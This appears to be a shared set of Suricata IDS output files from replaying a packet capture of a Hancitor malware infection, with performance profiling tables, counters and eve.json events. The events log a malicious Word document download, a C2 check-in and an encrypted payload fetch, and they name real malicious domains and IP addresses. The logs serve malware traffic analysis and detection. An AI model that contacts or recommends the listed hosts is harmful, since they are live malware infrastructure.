29/3/2019 -- 07:44:04 - <Perf> - Builtin MPM "other IP packet": 3
29/3/2019 -- 07:44:04 - <Perf> - AppLayer MPM "toserver http_uri": 14
29/3/2019 -- 07:44:04 - <Perf> - AppLayer MPM "toserver http_request_line": 1
29/3/2019 -- 07:44:04 - <Perf> - AppLayer MPM "toserver http_client_body": 6
29/3/2019 -- 07:44:04 - <Perf> - AppLayer MPM "toclient http_response_line": 1
29/3/2019 -- 07:44:04 - <Perf> - AppLayer MPM "toserver http_header": 10
29/3/2019 -- 07:44:04 - <Perf> - AppLayer MPM "toclient http_header": 6
29/3/2019 -- 07:44:04 - <Perf> - AppLayer MPM "toserver http_header_names": 2
29/3/2019 -- 07:44:04 - <Perf> - AppLayer MPM "toserver http_accept": 1
29/3/2019 -- 07:44:04 - <Perf> - AppLayer MPM "toserver http_referer": 1
29/3/2019 -- 07:44:04 - <Perf> - AppLayer MPM "toserver http_content_len": 1
29/3/2019 -- 07:44:04 - <Perf> - AppLayer MPM "toserver http_content_type": 1
29/3/2019 -- 07:44:04 - <Perf> - AppLayer MPM "toclient http_content_type": 1
29/3/2019 -- 07:44:04 - <Perf> - AppLayer MPM "toserver http_protocol": 1
29/3/2019 -- 07:44:04 - <Perf> - AppLayer MPM "toserver http_start": 1
29/3/2019 -- 07:44:04 - <Perf> - AppLayer MPM "toserver http_raw_header": 1
29/3/2019 -- 07:44:04 - <Perf> - AppLayer MPM "toclient http_raw_header": 1
29/3/2019 -- 07:44:04 - <Perf> - AppLayer MPM "toserver http_method": 5
29/3/2019 -- 07:44:04 - <Perf> - AppLayer MPM "toserver http_cookie": 1
29/3/2019 -- 07:44:04 - <Perf> - AppLayer MPM "toclient http_cookie": 2
29/3/2019 -- 07:44:04 - <Perf> - AppLayer MPM "toserver http_raw_uri": 1
29/3/2019 -- 07:44:04 - <Perf> - AppLayer MPM "toserver http_user_agent": 6
29/3/2019 -- 07:44:04 - <Perf> - AppLayer MPM "toserver http_host": 2
29/3/2019 -- 07:44:04 - <Perf> - AppLayer MPM "toclient http_stat_code": 2
29/3/2019 -- 07:44:04 - <Perf> - AppLayer MPM "toserver dns_query": 4
29/3/2019 -- 07:44:04 - <Perf> - AppLayer MPM "toserver tls_sni": 2
29/3/2019 -- 07:44:04 - <Perf> - AppLayer MPM "toclient tls_cert_issuer": 2
29/3/2019 -- 07:44:04 - <Perf> - AppLayer MPM "toclient tls_cert_subject": 1
29/3/2019 -- 07:44:04 - <Perf> - AppLayer MPM "toclient tls_cert_serial": 1
29/3/2019 -- 07:44:04 - <Perf> - AppLayer MPM "toserver ssh_protocol": 1
29/3/2019 -- 07:44:04 - <Perf> - AppLayer MPM "toserver file_data": 1
29/3/2019 -- 07:44:04 - <Perf> - AppLayer MPM "toclient file_data": 7
29/3/2019 -- 07:44:06 - <Perf> - Registered 39590 rule profiling counters.
29/3/2019 -- 07:44:06 - <Info> - fast output device (regular) initialized: alert
29/3/2019 -- 07:44:06 - <Info> - eve-log output device (regular) initialized: eve.json
29/3/2019 -- 07:44:06 - <Config> - enabling 'eve-log' module 'alert'
29/3/2019 -- 07:44:06 - <Config> - enabling 'eve-log' module 'http'
29/3/2019 -- 07:44:06 - <Config> - enabling 'eve-log' module 'dns'
29/3/2019 -- 07:44:06 - <Config> - enabling 'eve-log' module 'tls'
29/3/2019 -- 07:44:06 - <Config> - enabling 'eve-log' module 'files'
29/3/2019 -- 07:44:06 - <Config> - enabling 'eve-log' module 'ssh'
29/3/2019 -- 07:44:06 - <Info> - Unified2-alert initialized: filename unified2.alert, limit 32 MB
29/3/2019 -- 07:44:06 - <Info> - stats output device (regular) initialized: stats.log
29/3/2019 -- 07:44:06 - <Config> - AutoFP mode using "Hash" flow load balancer
29/3/2019 -- 07:44:06 - <Info> - reading pcap file /var/pcap/03292019.0743-2018-12-20-Hancitor-1st-run-retreives-Pon

This file has been truncated. Go here to download in full.


packet_stats.log - (12163 bytes) - download
  1
  2
  3
  4
  5
  6
  7
  8
  9
 10
 11
 12
 13
 14
 15
 16
 17
 18
 19
 20
 21
 22
 23
 24
 25
 26
 27
 28
 29
 30
 31
 32
 33
 34
 35
 36
 37
 38
 39
 40
 41
 42
 43
 44
 45
 46
 47
 48
 49
 50
 51
 52
 53
 54
 55
 56
 57
 58
 59
 60
 61
 62
 63
 64
 65
 66
 67
 68
 69
 70
 71
 72
 73
 74
 75
 76
 77
 78
 79
 80
 81
 82
 83
 84
 85
 86
 87
 88
 89
 90
 91
 92
 93
 94
 95
 96
 97
 98
 99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
Packet profile dump:

IP ver   Proto   cnt            min            max            avg            tot           %% 
------   -----   ----------     ------------   ------------   -----------    -----------   ---
 IPv4       6           833          3960788      312809277     189088650        157.5b   99.14
 IPv4      17            10         15870487      184984441     137206223          1.4b    0.86
Note: Protocol 256 tracks pseudo/tunnel packets.

Per Thread module stats:

Thread Module              IP ver   Proto   cnt            min            max            avg            tot           %% 
------------------------   ------   -----   ----------     ------------   ------------   -----------    -----------   ---
TMM_FLOWWORKER              IPv4       6           833            67778       16170263        403930        336.5m   96.88
TMM_FLOWWORKER              IPv4      17            10           432562        1117527        582178          5.8m    1.68
TMM_RECEIVEPCAPFILE         IPv4       6           826             2549           4555          3021          2.5m    0.72
TMM_RECEIVEPCAPFILE         IPv4      17            10             2809           9944          3600         36.0k    0.01
TMM_DECODEPCAPFILE          IPv4       6           826             2658          31410          2906          2.4m    0.69
TMM_DECODEPCAPFILE          IPv4      17            10             2768          38291          6483         64.8k    0.02

Flow Worker            IP ver   Proto   cnt            min            max            avg         
--------------------   ------   -----   ----------     ------------   ------------   ----------- 
flow                    IPv4       6           826             2750          26797          3287          2.7m  0.84  
flow                    IPv4      17            10             3124          20246          6087         60.9k  0.02  
stream                  IPv4       6           833             2934         361058          8964          7.5m  2.30  
app-layer               IPv4      17            10            10111          74765         24033        240.3k  0.07  
detect                  IPv4       6           833            45331       15804806        369620        307.9m  94.69 
detect                  IPv4      17            10           339471         658592        426943          4.3m  1.31  
tcp-prune               IPv4       6           833             2554          16448          3004          2.5m  0.77  
Note: stream includes app-layer for TCP

Per App layer parser stats:

App Layer              IP ver   Proto   cnt            min            max            avg         
--------------------   ------   -----   ----------     ------------   ------------   ----------- 
http                    IPv4       6            10             2958          16030          6546         65.5k  44.98 
dns                     IPv4      17            10             4653          21370          8008         80.1k  55.02 
Proto detect            IPv4      17            10             5305          42446         17215        172.2k

Log Thread Module          IP ver   Proto   cnt            min            max            avg            tot           %% 
------------------------   ------   -----   ----------     ------------   ------------   -----------    -----------   ---

Logger/output stats:

Logger                     IP ver   Proto   cnt            min            max            avg            tot         
------------------------   ------   -----   ----------     ------------   ------------   -----------    ----------- 
LOGGER_ALERT_FAST           IPv4       6            11            30032          85001         41489        456.4k  10.07 
LOGGER_UNIFIED2             IPv4       6            11            23878         122587         54830        603.1k  13.30 
LOGGER_JSON_ALERT           IPv4       6            11            49392         100943         66698        733.7k  16.18 
LOGGER_JSON_DNS             IPv4      17            10            33275         336131        109195          1.1m  24.09 
LOGGER_JSON_HTTP            IPv4       6             9            36119         147207         72001        648.0k  14.29 
LOGGER_JSON_FILE            IPv4       6            12            47309         181284         83375          1.0m  22.07 

Prefilter                        IP ver   Proto   cnt            min            max            avg            tot          %% 
--------------------             ------   -----   ----------     ------------   ------------   -----------    ---------    ---
payload                           IPv4       6           539             2575         153562         19521        10.5m  9.47  
payload                           IPv4      17            10            13899          94665         32151       321.5k  0.29  
stream                            IPv4       6           539             2544         923385         37689        20.3m  18.28 
http_uri                          IPv4       6             9             4953          29868         18288       164.6k  0.15  
http_request_line                 IPv4       6             9             4839          19819          7573        68.2k  0.06  
http_client_body                  IPv4       6            11             2755          45027         13444       147.9k  0.13  
http_header (request)             IPv4       6             9            28761         153921         75931       683.4k  0.61  
http_header (request trailer)     IPv4       6             9             2643           3489          2806        25.3k  0.02  
http_header_names (request)       IPv4       6             9            10860        5069925        577636         5.2m  4.68  
http_accept (request)             IPv4       6             9             2993           9246          4090        36.8k  0.03  
http_referer (request)            IPv4       6             9             2863           3800          3149        28.3k  0.03  
http_content_len (request)        IPv4       6             9             2892           5246          3873        34.9k  0.03  
http_content_type (request)       IPv4       6             9             2855          12834          5530        49.8k  0.04  
http_protocol (request)           IPv4       6             9             3520           6428          4613        41.5k  0.04  
http_start (request)              IPv4       6             9             9169          20125         12736       114.6k  0.10  
http_raw_header (request)         IPv4       6            11             8572          18526         12636       139.0k  0.13  
http_method                       IPv4       6             9             4719           7803          5739        51.7k  0.05  
http_cookie (request)             IPv4       6             9             2932           4375          3425        30.8k  0.03  
http_raw_uri                      IPv4       6             9             3019           6404          4853        43.7k  0.04  
http_user_agent                   IPv4       6             9            14055          44279         27875       250.9k  0.23  
http_host                         IPv4       6             9             5137           9696          6789        61.1k  0.05  
dns_query                         IPv4      17             5             6439          13726          9596        48.0k  0.04  
http_response_line                IPv4       6             9             3816          10112          8027        72.2k  0.07  
http_header (response)            IPv4       6             9            21727          48353         34361       309.3k  0.28  
http_header (response trailer)    IPv4       6             9             2603           4397          3121        28.1k  0.03  
http_content_type (response)      IPv4       6             9             3164          10808          5953        53.6k  0.05  
http_raw_header (response)        IPv4       6           508             4054          36169          4745         2.4m  2.17  
http_cookie (response)            IPv4       6             9             2995           4189          3303        29.7k  0.03  
http_stat_code                    IPv4       6             9             2897           5201          4043        36.4k  0.03  
file_data (http response)         IPv4       6           499             2587       13284447        139893        69.8m  62.82 
Total                             IPv4                  2320                                         47898       111.1m

General detection engine stats:

Detection phase            IP ver   Proto   cnt            min            max            avg            tot         
------------------------   ------   -----   ----------     ------------   ------------   -----------    ----------- 
PROF_DETECT_IPONLY          IPv4       6            12             8961          59073         30746        369.0k  0.08  
PROF_DETECT_IPONLY          IPv4      17            10            36877          83222         46861        468.6k  0.10  
PROF_DETECT_RULES           IPv4       6           833             2538        6559620        150991        125.8m  26.29 
PROF_DETECT_RULES           IPv4      17            10           195084         355661        247500          2.5m  0.52  
PROF_DETECT_STATEFUL_START    IPv4       6           447             5109        1928616        140387         62.8m  13.12 
PROF_DETECT_STATEFUL_CONT    IPv4       6           833             2578          89341         13028         10.9m  2.27  
PROF_DETECT_STATEFUL_CONT    IPv4      17            10             5736          54485         10993        109.9k  0.02  
PROF_DETECT_STATEFUL_UPDATE    IPv4       6           809             2557          32979          2823          2.3m  0.48  
PROF_DETECT_STATEFUL_UPDATE    IPv4      17            10             2695          14379          4030         40.3k  0.01  
PROF_DETECT_PREFILTER       IPv4       6           833             7901       13475870        165131        137.6m  28.76 
PROF_DETECT_PREFILTER       IPv4      17            10            47512         120914         66116        661.2k  0.14  
PROF_DETECT_PF_PAYLOAD      IPv4       6           539            14291         934073         65384         35.2m  7.37  
PROF_DETECT_PF_PAYLOAD      IPv4      17            10            19261          99837         37454        374.5k  0.08  
PROF_DETECT_PF_TX           IPv4       6           809             2555       13298602        105928         85.7m  17.91 
PROF_DETECT_PF_TX           IPv4      17             5            12112          21259         15671         78.4k  0.02  
PROF_DETECT_PF_SORT1        IPv4       6           329             2545          44067          3890          1.3m  0.27  
PROF_DETECT_PF_SORT1        IPv4      17            10             3787           6078          4463         44.6k  0.01  
PROF_DETECT_PF_SORT2        IPv4       6           833             2523          29173          2925          2.4m  0.51  
PROF_DETECT_PF_SORT2        IPv4      17            10             2936           8417          3862         38.6k  0.01  
PROF_DETECT_NONMPMLIST      IPv4       6           833             2531          33696          2880          2.4m  0.50  
PROF_DETECT_NONMPMLIST      IPv4      17            10             2897           3724          3124         31.2k  0.01  
PROF_DETECT_ALERT           IPv4       6           833             2527          32282          2789          2.3m  0.49  
PROF_DETECT_ALERT           IPv4      17            10             2534          16404          4028         40.3k  0.01  
PROF_DETECT_CLEANUP         IPv4       6           833             2571          16310          2872          2.4m  0.50  
PROF_DETECT_CLEANUP         IPv4      17            10             3026           4941          3622         36.2k  0.01  
PROF_DETECT_GETSGH          IPv4       6           833             2527          27499          3038          2.5m  0.53  
PROF_DETECT_GETSGH          IPv4      17            10             5630           6766          6149         61.5k  0.01  


stats.log - (2911 bytes) - download
 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
------------------------------------------------------------------------------------
Date: 3/29/2019 -- 07:44:08 (uptime: 0d, 00h 00m 02s)
------------------------------------------------------------------------------------
Counter                                    | TM Name                   | Value
------------------------------------------------------------------------------------
decoder.pkts                               | Total                     | 836
decoder.bytes                              | Total                     | 740503
decoder.ipv4                               | Total                     | 836
decoder.ethernet                           | Total                     | 836
decoder.tcp                                | Total                     | 826
decoder.udp                                | Total                     | 10
decoder.avg_pkt_size                       | Total                     | 885
decoder.max_pkt_size                       | Total                     | 1514
flow.tcp                                   | Total                     | 6
flow.udp                                   | Total                     | 5
tcp.sessions                               | Total                     | 6
tcp.syn                                    | Total                     | 6
tcp.synack                                 | Total                     | 6
tcp.rst                                    | Total                     | 1
detect.alert                               | Total                     | 11
detect.mpm_list                            | Total                     | 5
detect.nonmpm_list                         | Total                     | 2
detect.match_list                          | Total                     | 5
app_layer.flow.http                        | Total                     | 6
app_layer.tx.http                          | Total                     | 9
app_layer.flow.dns_udp                     | Total                     | 5
app_layer.tx.dns_udp                       | Total                     | 5
flow.spare                                 | Total                     | 10000
flow_mgr.flows_checked                     | Total                     | 10
flow_mgr.flows_notimeout                   | Total                     | 9
flow_mgr.flows_timeout                     | Total                     | 1
flow_mgr.flows_timeout_inuse               | Total                     | 1
flow_mgr.rows_checked                      | Total                     | 65536
flow_mgr.rows_skipped                      | Total                     | 65526
flow_mgr.rows_maxlen                       | Total                     | 1
tcp.memuse                                 | Total                     | 573440
tcp.reassembly_memuse                      | Total                     | 81920
flow.memuse                                | Total                     | 7077472


eve.json - (26253 bytes) - download
 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
{"timestamp":"2018-12-20T15:22:53.562141+0000","flow_id":730838946649053,"pcap_cnt":1,"event_type":"dns","src_ip":"10.12.20.101","src_port":62743,"dest_ip":"10.12.20.1","dest_port":53,"proto":"UDP","dns":{"type":"query","id":62625,"rrname":"louisianarxcoupon.com","rrtype":"A","tx_id":0}}
{"timestamp":"2018-12-20T15:22:53.901771+0000","flow_id":730838946649053,"pcap_cnt":2,"event_type":"dns","src_ip":"10.12.20.1","src_port":53,"dest_ip":"10.12.20.101","dest_port":62743,"proto":"UDP","dns":{"type":"answer","id":62625,"rcode":"NOERROR","rrname":"louisianarxcoupon.com","rrtype":"A","ttl":5,"rdata":"47.90.254.148"}}
{"timestamp":"2018-12-20T15:22:53.901771+0000","flow_id":730838946649053,"pcap_cnt":2,"event_type":"dns","src_ip":"10.12.20.1","src_port":53,"dest_ip":"10.12.20.101","dest_port":62743,"proto":"UDP","dns":{"type":"answer","id":62625,"rcode":"NOERROR","rrname":"louisianarxcoupon.com","rrtype":"NS","ttl":5,"rdata":"b.dnspod.com"}}
{"timestamp":"2018-12-20T15:22:53.901771+0000","flow_id":730838946649053,"pcap_cnt":2,"event_type":"dns","src_ip":"10.12.20.1","src_port":53,"dest_ip":"10.12.20.101","dest_port":62743,"proto":"UDP","dns":{"type":"answer","id":62625,"rcode":"NOERROR","rrname":"louisianarxcoupon.com","rrtype":"NS","ttl":5,"rdata":"c.dnspod.com"}}
{"timestamp":"2018-12-20T15:22:53.901771+0000","flow_id":730838946649053,"pcap_cnt":2,"event_type":"dns","src_ip":"10.12.20.1","src_port":53,"dest_ip":"10.12.20.101","dest_port":62743,"proto":"UDP","dns":{"type":"answer","id":62625,"rcode":"NOERROR","rrname":"louisianarxcoupon.com","rrtype":"NS","ttl":5,"rdata":"a.dnspod.com"}}
{"timestamp":"2018-12-20T15:22:54.942662+0000","flow_id":251868488779290,"pcap_cnt":52,"event_type":"alert","src_ip":"47.90.254.148","src_port":80,"dest_ip":"10.12.20.101","dest_port":49169,"proto":"TCP","tx_id":0,"alert":{"action":"allowed","gid":1,"signature_id":2019837,"rev":3,"signature":"ET WEB_CLIENT SUSPICIOUS Possible Office Doc with Embedded VBA Project (Wide)","category":"Potentially Bad Traffic","severity":2},"app_proto":"http"}
{"timestamp":"2018-12-20T15:22:55.062240+0000","flow_id":251868488779290,"pcap_cnt":80,"event_type":"alert","src_ip":"47.90.254.148","src_port":80,"dest_ip":"10.12.20.101","dest_port":49169,"proto":"TCP","alert":{"action":"allowed","gid":1,"signature_id":2810419,"rev":1,"signature":"ETPRO CURRENT_EVENTS Inbound cmd.exe Base64 Encoded (ASCII) 1","category":"A Network Trojan was detected","severity":1},"app_proto":"http"}
{"timestamp":"2018-12-20T15:22:55.229956+0000","flow_id":251868488779290,"pcap_cnt":116,"event_type":"alert","src_ip":"47.90.254.148","src_port":80,"dest_ip":"10.12.20.101","dest_port":49169,"proto":"TCP","tx_id":0,"alert":{"action":"allowed","gid":1,"signature_id":2022303,"rev":3,"signature":"ET TROJAN ASCII Executable Inside of MSCOFF File DL Over HTTP","category":"A Network Trojan was detected","severity":1},"app_proto":"http"}
{"timestamp":"2018-12-20T15:22:57.020877+0000","flow_id":251868488779290,"pcap_cnt":274,"event_type":"http","src_ip":"10.12.20.101","src_port":49169,"dest_ip":"47.90.254.148","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"louisianarxcoupon.com","url":"\/?861ALEL=YHmQV1GOYGQBSOFSGSQJPSBOQZCQi","http_user_agent":"Mozilla\/5.0 (Windows NT 6.1; WOW64; Trident\/7.0; rv:11.0) like Gecko","http_content_type":"application\/msword"}}
{"timestamp":"2018-12-20T15:25:46.720993+0000","flow_id":1872149207449697,"pcap_cnt":276,"event_type":"dns","src_ip":"10.12.20.101","src_port":64354,"dest_ip":"10.12.20.1","dest_port":53,"proto":"UDP","dns":{"type":"query","id":34095,"rrname":"api.ipify.org","rrtype":"A","tx_id":0}}
{"timestamp":"2018-12-20T15:25:46.805882+0000","flow_id":1872149207449697,"pcap_cnt":277,"event_type":"dns","src_ip":"10.12.20.1","src_port":53,"dest_ip":"10.12.20.101","dest_port":64354,"proto":"UDP","dns":{"type":"answer","id":34095,"rcode":"NOERROR","rrname":"api.ipify.org","rrtype":"CNAME","ttl":5,"rdata":"nagano-19599.herokussl.com"}}
{"timestamp":"2018-12-20T15:25:46.805882+0000","flow_id":1872149207449697,"pcap_cnt":277,"event_type":"dns","src_ip":"10.12.20.1","src_port":53,"dest_ip":"10.12.20.101","dest_port":64354,"proto":"UDP","dns":{"type":"answer","id":34095,"rcode":"NOERROR","rrname":"nagano-19599.herokussl.com","rrtype":"CNAME","ttl":5,"rdata":"elb097307-934924932.us-east-1.elb.amazonaws.com"}}
{"timestamp":"2018-12-20T15:25:46.805882+0000","flow_id":1872149207449697,"pcap_cnt":277,"event_type":"dns","src_ip":"10.12.20.1","src_port":53,"dest_ip":"10.12.20.101","dest_port":64354,"proto":"UDP","dns":{"type":"answer","id":34095,"rcode":"NOERROR","rrname":"elb097307-934924932.us-east-1.elb.amazonaws.com","rrtype":"A","ttl":5,"rdata":"54.243.123.39"}}
{"timestamp":"2018-12-20T15:25:46.805882+0000","flow_id":1872149207449697,"pcap_cnt":277,"event_type":"dns","src_ip":"10.12.20.1","src_port":53,"dest_ip":"10.12.20.101","dest_port":64354,"proto":"UDP","dns":{"type":"answer","id":34095,"rcode":"NOERROR","rrname":"elb097307-934924932.us-east-1.elb.amazonaws.com","rrtype":"A","ttl":5,"rdata":"54.204.36.156"}}
{"timestamp":"2018-12-20T15:25:46.805882+0000","flow_id":1872149207449697,"pcap_cnt":277,"event_type":"dns","src_ip":"10.12.20.1","src_port":53,"dest_ip":"10.12.20.101","dest_port":64354,"proto":"UDP","dns":{"type":"answer","id":34095,"rcode":"NOERROR","rrname":"elb097307-934924932.us-east-1.elb.amazonaws.com","rrtype":"A","ttl":5,"rdata":"54.221.234.215"}}
{"timestamp":"2018-12-20T15:25:46.805882+0000","flow_id":1872149207449697,"pcap_cnt":277,"event_type":"dns","src_ip":"10.12.20.1","src_port":53,"dest_ip":"10.12.20.101","dest_port":64354,"proto":"UDP","dns":{"type":"answer","id":34095,"rcode":"NOERROR","rrname":"elb097307-934924932.us-east-1.elb.amazonaws.com","rrtype":"A","ttl":5,"rdata":"23.21.121.219"}}
{"timestamp":"2018-12-20T15:25:46.805882+0000","flow_id":1872149207449697,"pcap_cnt":277,"event_type":"dns","src_ip":"10.12.20.1","src_port":53,"dest_ip":"10.12.20.101","dest_port":64354,"proto":"UDP","dns":{"type":"answer","id":34095,"rcode":"NOERROR","rrname":"elb097307-934924932.us-east-1.elb.amazonaws.com","rrtype":"A","ttl":5,"rdata":"23.23.114.123"}}
{"timestamp":"2018-12-20T15:25:46.805882+0000","flow_id":1872149207449697,"pcap_cnt":277,"event_type":"dns","src_ip":"10.12.20.1","src_port":53,"dest_ip":"10.12.20.101","dest_port":64354,"proto":"UDP","dns":{"type":"answer","id":34095,"rcode":"NOERROR","rrname":"elb097307-934924932.us-east-1.elb.amazonaws.com","rrtype":"A","ttl":5,"rdata":"50.16.248.221"}}
{"timestamp":"2018-12-20T15:25:46.805882+0000","flow_id":1872149207449697,"pcap_cnt":277,"event_type":"dns","src_ip":"10.12.20.1","src_port":53,"dest_ip":"10.12.20.101","dest_port":64354,"proto":"UDP","dns":{"type":"answer","id":34095,"rcode":"NOERROR","rrname":"us-east-1.elb.amazonaws.com","rrtype":"NS","ttl":5,"rdata":"ns-1793.awsdns-32.co.uk"}}
{"timestamp":"2018-12-20T15:25:46.805882+0000","flow_id":1872149207449697,"pcap_cnt":277,"event_type":"dns","src_ip":"10.12.20.1","src_port":53,"dest_ip":"10.12.20.101","dest_port":64354,"proto":"UDP","dns":{"type":"answer","id":34095,"rcode":"NOERROR","rrname":"us-east-1.elb.amazonaws.com","rrtype":"NS","ttl":5,"rdata":"ns-1119.awsdns-11.org"}}
{"timestamp":"2018-12-20T15:25:46.805882+0000","flow_id":1872149207449697,"pcap_cnt":277,"event_type":"dns","src_ip":"10.12.20.1","src_port":53,"dest_ip":"10.12.20.101","dest_port":64354,"proto":"UDP","dns":{"type":"answer","id":34095,"rcode":"NOERROR","rrname":"us-east-1.elb.amazonaws.com","rrtype":"NS","ttl":5,"rdata":"ns-934.awsdns-52.net"}}
{"timestamp":"2018-12-20T15:25:46.805882+0000","flow_id":1872149207449697,"pcap_cnt":277,"event_type":"dns","src_ip":"10.12.20.1","src_port":53,"dest_ip":"10.12.20.101","dest_port":64354,"proto":"UDP","dns":{"type":"answer","id":34095,"rcode":"NOERROR","rrname":"us-east-1.elb.amazonaws.com","rrtype":"NS","ttl":5,"rdata":"ns-235.awsdns-29.com"}}
{"timestamp":"2018-12-20T15:25:47.005825+0000","flow_id":377556423042032,"pcap_cnt":284,"event_type":"alert","src_ip":"10.12.20.101","src_port":49172,"dest_ip":"54.243.123.39","dest_port":80,"proto":"TCP","tx_id":0,"alert":{"action":"allowed","gid":1,"signature_id":2021997,"rev":3,"signature":"ET POLICY External IP Lookup api.ipify.org","category":"Potential Corporate Privacy Violation","severity":1},"app_proto":"http"}
{"timestamp":"2018-12-20T15:25:47.005825+0000","flow_id":377556423042032,"pcap_cnt":284,"event_type":"http","src_ip":"10.12.20.101","src_port":49172,"dest_ip":"54.243.123.39","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"api.ipify.org","url":"\/","http_user_agent":"Mozilla\/5.0 (Windows NT 6.1; Win64; x64; Trident\/7.0; rv:11.0) like Gecko","http_content_type":"text\/plain"}}
{"timestamp":"2018-12-20T15:25:47.013951+0000","flow_id":1842887595341439,"pcap_cnt":285,"event_type":"dns","src_ip":"10.12.20.101","src_port":64803,"dest_ip":"10.12.20.1","dest_port":53,"proto":"UDP","dns":{"type":"query","id":11452,"rrname":"torsgotuldrat.com","rrtype":"A","tx_id":0}}
{"timestamp":"2018-12-20T15:25:47.778936+0000","flow_id":1842887595341439,"pcap_cnt":286,"event_type":"dns","src_ip":"10.12.20.1","src_port":53,"dest_ip":"10.12.20.101","dest_port":64803,"proto":"UDP","dns":{"type":"answer","id":11452,"rcode":"NOERROR","rrname":"torsgotuldrat.com","rrtype":"A","ttl":5,"rdata":"217.23.139.203"}}
{"timestamp":"2018-12-20T15:25:47.778936+0000","flow_id":1842887595341439,"pcap_cnt":286,"event_type":"dns","src_ip":"10.12.20.1","src_port":53,"dest_ip":"10.12.20.101","dest_port":64803,"proto":"UDP","dns":{"type":"answer","id":11452,"rcode":"NOERROR","rrname":"torsgotuldrat.com","rrtype":"NS","ttl":5,"rdata":"ns4.cnmsn.com"}}
{"timestamp":"2018-12-20T15:25:47.778936+0000","flow_id":1842887595341439,"pcap_cnt":286,"event_type":"dns","src_ip":"10.12.20.1","src_port":53,"dest_ip":"10.12.20.101","dest_port":64803,"proto":"UDP","dns":{"type":"answer","id":11452,"rcode":"NOERROR","rrname":"torsgotuldrat.com","rrtype":"NS","ttl":5,"rdata":"ns3.cnmsn.com"}}
{"timestamp":"2018-12-20T15:25:48.598795+0000","flow_id":424689394247739,"pcap_cnt":294,"event_type":"alert","src_ip":"10.12.20.101","src_port":49173,"dest_ip":"217.23.139.203","dest_port":80,"proto":"TCP","tx_id":0,"alert":{"action":"allowed","gid":1,"signature_id":2819978,"rev":5,"signature":"ETPRO TROJAN Tordal\/Hancitor\/Chanitor Checkin","category":"A Network Trojan was detected","severity":1},"app_proto":"http"}
{"timestamp":"2018-12-20T15:25:48.598795+0000","flow_id":424689394247739,"pcap_cnt":294,"event_type":"http","src_ip":"10.12.20.101","src_port":49173,"dest_ip":"217.23.139.203","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"torsgotuldrat.com","url":"\/4\/forum.php","http_user_agent":"Mozilla\/5.0 (Windows NT 6.1; Win64; x64; Trident\/7.0; rv:11.0) like Gecko","http_content_type":"text\/html"}}
{"timestamp":"2018-12-20T15:25:48.598795+0000","flow_id":424689394247739,"pcap_cnt":294,"event_type":"fileinfo","src_ip":"10.12.20.101","src_port":49173,"dest_ip":"217.23.139.203","dest_port":80,"proto":"TCP","http":{"hostname":"torsgotuldrat.com","url":"\/4\/forum.php","http_user_agent":"Mozilla\/5.0 (Windows NT 6.1; Win64; x64; Trident\/7.0; rv:11.0) like Gecko","http_content_type":"text\/html","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":1550},"app_proto":"http","fileinfo":{"filename":"\/4\/forum.php","gaps":false,"state":"CLOSED","stored":false,"size":129,"tx_id":0}}
{"timestamp":"2018-12-20T15:25:48.600055+0000","flow_id":1599663597430775,"pcap_cnt":295,"event_type":"dns","src_ip":"10.12.20.101","src_port":50093,"dest_ip":"10.12.20.1","dest_port":53,"proto":"UDP","dns":{"type":"query","id":49915,"rrname":"mercurysroadie.com","rrtype":"A","tx_id":0}}
{"timestamp":"2018-12-20T15:25:48.706217+0000","flow_id":1599663597430775,"pcap_cnt":296,"event_type":"dns","src_ip":"10.12.20.1","src_port":53,"dest_ip":"10.12.20.101","dest_port":50093,"proto":"UDP","dns":{"type":"answer","id":49915,"rcode":"NOERROR","rrname":"mercurysroadie.com","rrtype":"A","ttl":5,"rdata":"45.40.149.34"}}
{"timestamp":"2018-12-20T15:25:48.706217+0000","flow_id":1599663597430775,"pcap_cnt":296,"event_type":"dns","src_ip":"10.12.20.1","src_port":53,"dest_ip":"10.12.20.101","dest_port":50093,"proto":"UDP","dns":{"type":"answer","id":49915,"rcode":"NOERROR","rrname":"mercurysroadie.com","rrtype":"NS","ttl":5,"rdata":"ns52.domaincontrol.com"}}
{"timestamp":"2018-12-20T15:25:48.706217+0000","flow_id":1599663597430775,"pcap_cnt":296,"event_type":"dns","src_ip":"10.12.20.1","src_port":53,"dest_ip":"10.12.20.101","dest_port":50093,"proto":"UDP","dns":{"type":"answer","id":49915,"rcode":"NOERROR","rrname":"mercurysroadie.com","rrtype":"NS","ttl":5,"rdata":"ns51.domaincontrol.com"}}
{"timestamp":"2018-12-20T15:25:49.015213+0000","flow_id":594559645829544,"pcap_cnt":345,"event_type":"alert","src_ip":"45.40.149.34","src_port":80,"dest_ip":"10.12.20.101","dest_port":49174,"proto":"TCP","tx_id":0,"alert":{"action":"allowed","gid":1,"signature_id":2824549,"rev":2,"signature":"ETPRO CURRENT_EVENTS Hancitor encrypted payload Jan 17 (1)","category":"A Network Trojan was detected","severity":1},"app_proto":"http"}
{"timestamp":"2018-12-20T15:25:49.094666+0000","flow_id":594559645829544,"pcap_cnt":361,"event_type":"http","src_ip":"10.12.20.101","src_port":49174,"dest_ip":"45.40.149.34","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mercurysroadie.com","url":"\/wp-content\/plugins\/contact-widgets\/1","http_user_agent":"Mozilla\/5.0 (Windows NT 6.1; Win64; x64; Trident\/7.0; rv:11.0) like Gecko"}}
{"timestamp":"2018-12-20T15:25:55.050408+0000","flow_id":2023933352330472,"pcap_cnt":362,"event_type":"dns","src_ip":"10.12.20.101","src_port":52595,"dest_ip":"10.12.20.1","dest_port":53,"proto":"UDP","dns":{"type":"query","id":26573,"rrname":"torsgotuldrat.com","rrtype":"A","tx_id":0}}
{"timestamp":"2018-12-20T15:25:55.155359+0000","flow_id":2023933352330472,"pcap_cnt":363,"event_type":"dns","src_ip":"10.12.20.1","src_port":53,"dest_ip":"10.12.20.101","dest_port":52595,"proto":"UDP","dns":{"type":"answer","id":26573,"rcode":"NOERROR","rrname":"torsgotuldrat.com","rrtype":"A","ttl":5,"rdata":"217.23.139.203"}}
